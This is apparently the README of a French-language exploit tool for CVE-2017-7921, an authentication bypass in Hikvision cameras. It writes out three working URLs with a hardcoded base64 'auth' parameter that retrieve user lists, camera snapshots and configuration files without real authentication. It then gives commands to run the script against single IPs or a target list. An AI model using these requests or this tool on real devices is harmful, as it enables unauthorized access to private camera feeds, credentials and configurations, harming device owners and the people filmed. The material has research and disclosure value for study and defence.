
Exploit pour CVE-2017-7921 ciblant les appareils Hikvision avec une authentification inappropriée. Récupère les listes d'utilisateurs, les instantanés de caméra et les fichiers de configuration via des requêtes HTTP artisanales.
Un problème d'authentification incorrecte a été découvert dans les appareils Hikvision.
La vulnérabilité d'authentification incorrecte se produit lorsqu'une application n'authentifie pas correctement ou suffisamment les utilisateurs.
Cela peut permettre à un utilisateur malveillant d'élever ses privilèges sur le système et d'accéder à des informations sensibles.
# inj3ction
https://seclists.org/fulldisclosure/2017/Sep/23
Détails de la vulnérabilité :
----------------------
Récupérer la liste de tous les utilisateurs et leurs rôles :
http://camera.ip/Security/users?auth=YWRtaW46MTEK
Obtenir un instantané de la caméra sans authentification :
http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK
Et le pire, on peut télécharger la configuration de la caméra :
http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK
python3 -m pip install -r requirements.txt
python3 CVE_2017_7921_EXP.py -t xxx.xx.xx.xx run
python3 CVE_2017_7921_EXP.py -t ./targets.txt run
